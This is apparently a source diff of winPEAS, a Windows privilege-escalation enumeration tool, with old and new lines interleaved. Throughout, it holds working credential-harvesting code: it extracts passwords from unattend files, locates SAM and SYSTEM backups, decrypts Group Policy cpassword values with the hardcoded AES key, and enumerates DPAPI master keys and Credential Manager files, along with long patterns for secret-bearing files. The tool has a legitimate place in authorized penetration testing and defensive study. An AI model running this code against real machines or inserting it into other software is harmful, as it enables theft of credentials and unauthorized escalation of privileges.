SortedDictionary<string, Dictionary<string, string>> results = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files");
SortedDictionary<string, Dictionary<string, string>> results2 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files (x86)");
results.Concat(results2).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
//Get from Uninstall
string[] subkeys = MyUtils.GetRegSubkeys("HKLM", @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall");
if (subkeys != null)
{
foreach (string app in subkeys)
{
string installLocation = MyUtils.GetRegValue("HKLM", String.Format(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0}", app), "InstallLocation");
if (String.IsNullOrEmpty(installLocation))
continue;
installLocation = installLocation.Replace("\"", "");
if (installLocation.EndsWith(@"\"))
installLocation = installLocation.Substring(0, installLocation.Length - 1);
if (!results.ContainsKey(installLocation) && Directory.Exists(installLocation))
{
bool already = false;
foreach (string path in results.Keys)
{
if (installLocation.IndexOf(path) != -1) //Check for subfoldres of already found folders
{
already = true;
break;
}
}
if (!already)
results[installLocation] = MyUtils.GetRecursivePrivs(installLocation);
}
}
}
subkeys = MyUtils.GetRegSubkeys("HKLM", @"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall");
if (subkeys != null)
{
foreach (string app in subkeys)
{
string installLocation = MyUtils.GetRegValue("HKLM", String.Format(@"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{0}", app), "InstallLocation");
if (String.IsNullOrEmpty(installLocation))
continue;
installLocation = installLocation.Replace("\"", "");
if (installLocation.EndsWith(@"\"))
installLocation = installLocation.Substring(0, installLocation.Length - 1);
if (!results.ContainsKey(installLocation) && Directory.Exists(installLocation))
{
bool already = false;
foreach (string path in results.Keys)
{
if (installLocation.IndexOf(path) != -1) //Check for subfoldres of already found folders
{
already = true;
break;
}
}
if (!already)
results[installLocation] = MyUtils.GetRecursivePrivs(installLocation);
}
}
}
return results;
}
public static List<Dictionary<string, string>> GetAutoRunsFolder()

2
winPEAS/winPEASexe/winPEAS/Beaprint.cs
View File

@ -100,7 +100,7 @@ namespace winPEAS
System.Console.WriteLine(YELLOW + " [*] " + GREEN + "WinPEAS is a binary to enumerate possible paths to escalate privileges locally" + NOCOLOR);
System.Console.WriteLine(LBLUE + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
System.Console.WriteLine(LBLUE + " searchfast" + GRAY + " Avoid sleeping while searching files (notable amount of resources)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " fast" + GRAY + " Avoid very time consuming checks" + NOCOLOR);
System.Console.WriteLine(LBLUE + " searchall" + GRAY + " Search all known filenames whith possible credentials (coul take some mins)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " cmd" + GRAY + " Obtain wifi, cred manager and clipboard information executing CMD commands" + NOCOLOR);
System.Console.WriteLine(LBLUE + " notansi" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " systeminfo" + GRAY + " Search system information" + NOCOLOR);

389
winPEAS/winPEASexe/winPEAS/InterestingFiles.cs
View File

@ -1,19 +1,406 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text.RegularExpressions;
using System.Xml;
namespace winPEAS
{
class InterestingFiles
{
public static List<string> GetUnattendedInstallFiles()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string windir = System.Environment.GetEnvironmentVariable("windir");
string[] SearchLocations =
{
String.Format("{0}\\sysprep\\sysprep.xml", windir),
String.Format("{0}\\sysprep\\sysprep.inf", windir),
String.Format("{0}\\sysprep.inf", windir),
String.Format("{0}\\Panther\\Unattended.xml", windir),
String.Format("{0}\\Panther\\Unattend.xml", windir),
String.Format("{0}\\Panther\\Unattend\\Unattend.xml", windir),
String.Format("{0}\\Panther\\Unattend\\Unattended.xml", windir),
String.Format("{0}\\System32\\Sysprep\\unattend.xml", windir),
String.Format("{0}\\System32\\Sysprep\\Panther\\unattend.xml", windir),
String.Format("{0}\\..\\unattend.xml", windir),
String.Format("{0}\\..\\unattend.inf", windir),
};
foreach (string SearchLocation in SearchLocations)
{
if (System.IO.File.Exists(SearchLocation))
results.Add(SearchLocation);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> ExtractUnattenededPwd(string path)
{
List<string> results = new List<string>();
try {
string text = File.ReadAllText(path);
text = text.Replace("\n", "");
text = text.Replace("\r", "");
Regex regex = new Regex(@"<Password>.*</Password>");
foreach (Match match in regex.Matches(text))
results.Add(match.Value);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> GetSAMBackups()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string systemRoot = System.Environment.GetEnvironmentVariable("SystemRoot");
string[] SearchLocations =
{
String.Format(@"{0}\repair\SAM", systemRoot),
String.Format(@"{0}\System32\config\RegBack\SAM", systemRoot),
//String.Format(@"{0}\System32\config\SAM", systemRoot),
String.Format(@"{0}\repair\SYSTEM", systemRoot),
//String.Format(@"{0}\System32\config\SYSTEM", systemRoot),
String.Format(@"{0}\System32\config\RegBack\SYSTEM", systemRoot),
};
foreach (string SearchLocation in SearchLocations)
{
if (System.IO.File.Exists(SearchLocation))
results.Add(SearchLocation);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> GetMcAfeeSitelistFiles()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string drive = System.Environment.GetEnvironmentVariable("SystemDrive");
string[] SearchLocations =
{
String.Format("{0}\\Program Files\\", drive),
String.Format("{0}\\Program Files (x86)\\", drive),
String.Format("{0}\\Documents and Settings\\", drive),
String.Format("{0}\\Users\\", drive)
};
foreach (string SearchLocation in SearchLocations)
{
List<string> files = MyUtils.FindFiles(SearchLocation, "SiteList.xml");
foreach (string file in files)
results.Add(file);
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static Dictionary<string, Dictionary<string, string>> GetCachedGPPPassword()
{ //From SharpUP
Dictionary<string, Dictionary<string, string>> results = new Dictionary<string, Dictionary<string, string>>();
try
{
string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
if (!allUsers.Contains("ProgramData"))
{
// Before Windows Vista, the default value of AllUsersProfile was "C:\Documents and Settings\All Users"
// And after, "C:\ProgramData"
allUsers += "\\Application Data";
}
allUsers += "\\Microsoft\\Group Policy\\History"; // look only in the GPO cache folder
List<String> files = MyUtils.FindFiles(allUsers, "*.xml");
// files will contain all XML files
foreach (string file in files)
{
if (!(file.Contains("Groups.xml") || file.Contains("Services.xml")
|| file.Contains("Scheduledtasks.xml") || file.Contains("DataSources.xml")
|| file.Contains("Printers.xml") || file.Contains("Drives.xml")))
{
continue; // uninteresting XML files, move to next
}
XmlDocument xmlDoc = new XmlDocument();
xmlDoc.Load(file);
if (!xmlDoc.InnerXml.Contains("cpassword"))
{
continue; // no "cpassword" => no interesting content, move to next
}
Console.WriteLine("\r\n{0}", file);
string cPassword = "";
string UserName = "";
string NewName = "";
string Changed = "";
if (file.Contains("Groups.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/Groups/User/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Groups/User");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("userName"))
{
UserName = attr.Value;
}
if (attr.Name.Equals("newName"))
{
NewName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
//Console.WriteLine("\r\nA{0}", a.Attributes[0].Value);
}
else if (file.Contains("Services.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/NTServices/NTService/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/NTServices/NTService");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("accountName"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("Scheduledtasks.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/ScheduledTasks/Task/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/ScheduledTasks/Task");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("runAs"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("DataSources.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/DataSources/DataSource/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/DataSources/DataSource");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("Printers.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/Printers/SharedPrinter/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Printers/SharedPrinter");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else
{
// Drives.xml
XmlNode a = xmlDoc.SelectSingleNode("/Drives/Drive/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Drives/Drive");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
if (UserName.Equals(""))
{
UserName = "[BLANK]";
}
if (NewName.Equals(""))
{
NewName = "[BLANK]";
}
if (cPassword.Equals(""))
{
cPassword = "[BLANK]";
}
else
{
cPassword = DecryptGPP(cPassword);
}
if (Changed.Equals(""))
{
Changed = "[BLANK]";
}
results[file] = new Dictionary<string, string>();
results[file]["UserName"] = UserName;
results[file]["NewName"] = NewName;
results[file]["cPassword"] = cPassword;
results[file]["Changed"] = Changed;
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static string DecryptGPP(string cpassword)
{ //From SharpUP
int mod = cpassword.Length % 4;
switch (mod)
{
case 1:
cpassword = cpassword.Substring(0, cpassword.Length - 1);
break;
case 2:
cpassword += "".PadLeft(4 - mod, '=');
break;
case 3:
cpassword += "".PadLeft(4 - mod, '=');
break;
default:
break;
}
byte[] base64decoded = Convert.FromBase64String(cpassword);
AesCryptoServiceProvider aesObject = new AesCryptoServiceProvider();
byte[] aesKey = { 0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8, 0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b };
byte[] aesIV = new byte[aesObject.IV.Length];
aesObject.IV = aesIV;
aesObject.Key = aesKey;
ICryptoTransform aesDecryptor = aesObject.CreateDecryptor();
byte[] outBlock = aesDecryptor.TransformFinalBlock(base64decoded, 0, base64decoded.Length);
return System.Text.UnicodeEncoding.Unicode.GetString(outBlock);
}
public static List<string> ListUsersDocs()
{
List<string> results = new List<string>();
try
{
// returns files (w/ modification dates) that match the given pattern below
string patterns = "*diagram*;*.pdf;*.vsd;*.doc;*docx;*.xls;*.xlsx;";
string patterns = "*diagram*;*.pdf;*.vsd;*.doc;*docx;*.xls;*.xlsx";
if (MyUtils.IsHighIntegrity())
{

162
winPEAS/winPEASexe/winPEAS/KnownFileCredsInfo.cs
View File

@ -843,7 +843,7 @@ namespace winPEAS
string[] subkeys = MyUtils.GetRegSubkeys("HKU", String.Format("{0}\\Software\\Microsoft\\Terminal Server Client\\Servers", SID));
if (subkeys != null)
{
Console.WriteLine("\r\n\r\n=== Saved RDP Connection Information ({0}) ===", SID);
//Console.WriteLine("\r\n\r\n=== Saved RDP Connection Information ({0}) ===", SID);
foreach (string host in subkeys)
{
string usernameHint = MyUtils.GetRegValue("HKCU", String.Format("Software\\Microsoft\\Terminal Server Client\\Servers\\{0}", host), "UsernameHint");
@ -1351,27 +1351,33 @@ namespace winPEAS
string userName = parts[parts.Length - 1];
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
{
string userDPAPIBasePath = String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", dir);
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
string[] files = Directory.GetFiles(directory);
List<string> userDPAPIBasePaths = new List<string>();
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
foreach (string file in files)
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
{
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
{
{ "MasterKey", file },
{ "Accessed", String.Format("{0}", lastAccessed) },
{ "Modified", String.Format("{0}", lastModified) },
});
}
}
}
}
@ -1382,28 +1388,33 @@ namespace winPEAS
else
{
string userName = Environment.GetEnvironmentVariable("USERNAME");
string userDPAPIBasePath = String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
List<string> userDPAPIBasePaths = new List<string>();
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
if (System.IO.Directory.Exists(userDPAPIBasePath))
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
{
{ "MasterKey", file },
{ "Accessed", String.Format("{0}", lastAccessed) },
{ "Modified", String.Format("{0}", lastModified) },
});
}
}
}
}
@ -1435,35 +1446,40 @@ namespace winPEAS
string userName = parts[parts.Length - 1];
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
{
string userCredFilePath = String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir);
if (System.IO.Directory.Exists(userCredFilePath))
List<string> userCredFilePaths = new List<string>();
userCredFilePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
userCredFilePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
foreach (string userCredFilePath in userCredFilePaths)
{
string[] systemFiles = Directory.GetFiles(userCredFilePath);
if ((systemFiles != null) && (systemFiles.Length != 0))
if (System.IO.Directory.Exists(userCredFilePath))
{
foreach (string file in systemFiles)
string[] systemFiles = Directory.GetFiles(userCredFilePath);
if ((systemFiles != null) && (systemFiles.Length != 0))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
foreach (string file in systemFiles)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
{
{ "CredFile", file },
{ "Description", desc },
@ -1472,6 +1488,7 @@ namespace winPEAS
{ "Modified", String.Format("{0}", lastModified) },
{ "Size", String.Format("{0}", size) },
});
}
}
}
}
@ -1519,35 +1536,39 @@ namespace winPEAS
else
{
string userName = Environment.GetEnvironmentVariable("USERNAME");
string userCredFilePath = String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
List<string> userCredFilePaths = new List<string>();
userCredFilePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userCredFilePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
if (System.IO.Directory.Exists(userCredFilePath))
foreach (string userCredFilePath in userCredFilePaths)
{
string[] files = Directory.GetFiles(userCredFilePath);
foreach (string file in files)
if (System.IO.Directory.Exists(userCredFilePath))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
string[] files = Directory.GetFiles(userCredFilePath);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
byte[] stringLenArray = new byte[16];
Array.Copy(credentialArray, 56, stringLenArray, 0, 4);
int descLen = BitConverter.ToInt32(stringLenArray, 0);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
byte[] descBytes = new byte[descLen];
Array.Copy(credentialArray, 60, descBytes, 0, descLen - 4);
string desc = Encoding.Unicode.GetString(descBytes);
results.Add(new Dictionary<string, string>()
{
{ "CredFile", file },
{ "Description", desc },
@ -1556,6 +1577,7 @@ namespace winPEAS
{ "Modified", String.Format("{0}", lastModified) },
{ "Size", String.Format("{0}", size) },
});
}
}
}
}

39
winPEAS/winPEASexe/winPEAS/MyUtils.cs
View File

@ -392,10 +392,11 @@ namespace winPEAS
return results;
}
public static string PermInt2Str(int current_perm, bool only_write_or_equivalent = false)
public static string PermInt2Str(int current_perm, bool only_write_or_equivalent = false, bool is_service=false)
{
Dictionary<string, int> interesting_perms = new Dictionary<string, int>()
{
// This isn't an exhaustive list of possible permissions. Just the interesting ones.
{ "AllAccess", 0xf01ff},
{ "GenericAll", 0x10000000},
{ "FullControl", (int)FileSystemRights.FullControl },
@ -418,16 +419,22 @@ namespace winPEAS
{
{ "AllAccess", 0xf01ff},
{ "GenericAll", 0x10000000},
{ "FullControl", (int)FileSystemRights.FullControl },
{ "TakeOwnership", (int)FileSystemRights.TakeOwnership },
{ "FullControl", (int)FileSystemRights.FullControl }, //0x1f01ff
{ "TakeOwnership", (int)FileSystemRights.TakeOwnership }, //0x80000
{ "GenericWrite", 0x40000000 },
{ "WriteData/CreateFiles", (int)FileSystemRights.WriteData },
{ "Modify", (int)FileSystemRights.Modify },
{ "Write", (int)FileSystemRights.Write },
{ "ChangePermissions", (int)FileSystemRights.ChangePermissions },
{ "WriteData/CreateFiles", (int)FileSystemRights.WriteData }, //0x2
{ "Modify", (int)FileSystemRights.Modify }, //0x301bf
{ "Write", (int)FileSystemRights.Write }, //0x116
{ "ChangePermissions", (int)FileSystemRights.ChangePermissions }, //0x40000
};
}
if (is_service)
{
interesting_perms["Start"] = 0x00000010;
interesting_perms["Stop"] = 0x00000020;
}
try
{
foreach (KeyValuePair<string, int> entry in interesting_perms)
@ -444,12 +451,16 @@ namespace winPEAS
}
//From https://stackoverflow.com/questions/929276/how-to-recursively-list-all-the-files-in-a-directory-in-c
public static Dictionary<string, string> GecRecursivePrivs(string path)
public static Dictionary<string, string> GetRecursivePrivs(string path, int cont=0)
{
/*string root = @Path.GetPathRoot(Environment.SystemDirectory) + path;
var dirs = from dir in Directory.EnumerateDirectories(root) select dir;
return dirs.ToList();*/
Dictionary<string, string> results = new Dictionary<string, string>();
int max_dir_recurse = 130;
if (cont > max_dir_recurse)
return results; //"Limit" for apps with hundreds of thousands of folders
results[path] = ""; //If you cant open, then there are no privileges for you (and the try will explode)
try
{
@ -462,7 +473,8 @@ namespace winPEAS
{
results[f] = String.Join(", ", GetPermissionsFile(f, Program.currentUserSIDs));
}
results.Concat(GecRecursivePrivs(d)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
cont += 1;
results.Concat(GetRecursivePrivs(d, cont)).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
}
}
}
@ -604,15 +616,18 @@ namespace winPEAS
// search every pattern in this directory's files
foreach (string pattern in patterns.Split(';'))
{
Beaprint.AnsiPrint(String.Join("\n", Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly).Where(filepath => !filepath.Contains(".dll"))), color);
Beaprint.AnsiPrint(" "+String.Join("\n ", Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly).Where(filepath => !filepath.Contains(".dll"))), color);
}
if (!Program.search_fast)
Thread.Sleep(Program.search_time);
// go recurse in all sub-directories
foreach (var directory in Directory.GetDirectories(path))
FindFiles(directory, patterns, color);
foreach (string directory in Directory.GetDirectories(path))
{
if (!directory.Contains("AppData"))
FindFiles(directory, patterns, color);
}
}
catch (UnauthorizedAccessException) { }
catch (PathTooLongException) { }

223
winPEAS/winPEASexe/winPEAS/Program.cs
View File

@ -13,8 +13,7 @@ namespace winPEAS
public static string advisory = "winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.";
public static bool banner = true;
public static bool search_fast = false;
public static int search_time = 150;
static bool is_fast = false;
public static int search_time = 50;
static bool exec_cmd = false;
public static bool notcolor = false;
@ -33,8 +32,9 @@ namespace winPEAS
static string print_credStrings_limited = "[pP][aA][sS][sS][wW][a-zA-Z0-9_-]*|[pP][wW][dD][a-zA-Z0-9_-]*|[nN][aA][mM][eE]|[lL][oO][gG][iI][nN]|[cC][oO][nN][tT][rR][aA][sS][eE][a-zA-Z0-9_-]*|[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL][a-zA-Z0-9_-]*|[aA][pP][iI]|[tT][oO][kK][eE][nN]|[sS][eE][sS][sS][a-zA-Z0-9_-]*";
static string print_credStrings = print_credStrings_limited + "|[uU][sS][eE][rR][a-zA-Z0-9_-]*";
static List<string> credStringsRegex = new List<string> { "PASSW[a-zA-Z0-9_-]*=", "PWD[a-zA-Z0-9_-]*=", "USER[a-zA-Z0-9_-]*=", "NAME=", "&LOGIN", "=LOGIN", "CONTRASEÑA[a-zA-Z0-9_-]*=", "CREDENTIAL[a-zA-Z0-9_-]*=", "API_KEY", "TOKEN" };
static string patterns_file_creds = @"RDCMan.settings;*.rdg;*_history;.sudo_as_admin_successful;.profile;*bashrc;httpd.conf;*.plan;.htpasswd;.git-credentials;*.rhosts;hosts.equiv;Dockerfile;docker-compose.yml;credentials;credentials.db;access_tokens.db;accessTokens.json;legacy_credentials;azureProfile.json;appcmd.exe;scclient.exe;unattend.txt;*.gpg$;*.pgp$;*config*.php;elasticsearch.y*ml;kibana.y*ml;*.p12$;*.der$;*.csr$;*.cer$;known_hosts;id_rsa;id_dsa;*.ovpn;anaconda-ks.cfg;hostapd.conf;rsyncd.conf;cesi.conf;supervisord.conf;tomcat-users.xml;web.config;*.kdbx;KeePass.config;Ntds.dit;SAM;SYSTEM;FreeSSHDservice.ini;sysprep.inf;sysprep.xml;unattend.xml;unattended.xml;*vnc*.ini;*vnc*.c*nf*;*vnc*.txt;*vnc*.xml;groups.xml;services.xml;scheduledtasks.xml;printers.xml;drives.xml;datasources.xml;php.ini;https.conf;https-xampp.conf;httpd.conf;my.ini;my.cnf;access.log;error.log;server.xml;SiteList.xml;ConsoleHost_history.txt;setupinfo;setupinfo.bak";
